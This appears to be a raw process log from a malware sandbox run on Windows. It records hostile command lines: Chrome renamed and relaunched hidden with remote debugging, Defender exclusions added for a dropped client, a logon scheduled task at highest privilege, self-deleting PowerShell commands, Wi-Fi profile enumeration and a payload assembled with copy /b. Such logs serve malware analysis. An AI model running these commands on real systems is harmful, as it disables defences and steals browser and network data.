C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Users\Admin\Desktop\Files\XClient.exe

"C:\Users\Admin\Desktop\Files\XClient.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{73f494c0-76ee-4a8d-b7ea-7c4a71dcaf44}

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\XClient.exe'

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\Desktop\Files\Client-built.exe

"C:\Users\Admin\Desktop\Files\Client-built.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Runtime" /sc ONLOGON /tr "C:\Windows\system32\runtime.exe" /rl HIGHEST /f

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\system32\runtime.exe

"C:\Windows\system32\runtime.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Runtime" /sc ONLOGON /tr "C:\Windows\system32\runtime.exe" /rl HIGHEST /f

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\explorer.exe

explorer.exe

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\SysWOW64\cmd.exe

cmd /c md 704579

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SysWOW64\findstr.exe

findstr /V "MARTNMSPIDERRINGTONE" Mh

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x138,0x13c,0x140,0x114,0x144,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\Desktop\Files\v7wa24td.exe

"C:\Users\Admin\Desktop\Files\v7wa24td.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\Desktop\Files\kp8dnpa9.exe

"C:\Users\Admin\Desktop\Files\kp8dnpa9.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\Desktop\Files\test19.exe

"C:\Users\Admin\Desktop\Files\test19.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\chcp.com

chcp 65001

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Users\Admin\Desktop\Files\kp8dnpa9.exe

"C:\Users\Admin\Desktop\Files\kp8dnpa9.exe"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 6200 -ip 6200

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 324

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1940,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1936 /prefetch:2

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2168,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2388 /prefetch:3

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2424 /prefetch:8

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3168 /prefetch:1

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3132,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3232 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4472,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4504 /prefetch:1

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Consequence + ..\Gently + ..\Situations + ..\International + ..\Jet + ..\Commodities + ..\Mood + ..\Fastest + ..\Estimate + ..\Jessica + ..\Prof + ..\Becoming + ..\Princess + ..\Required + ..\Traveller + ..\Against u

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Users\Admin\AppData\Local\Temp\704579\Organizational.pif

Organizational.pif u

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5096,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5080 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5196,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5188 /prefetch:8

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

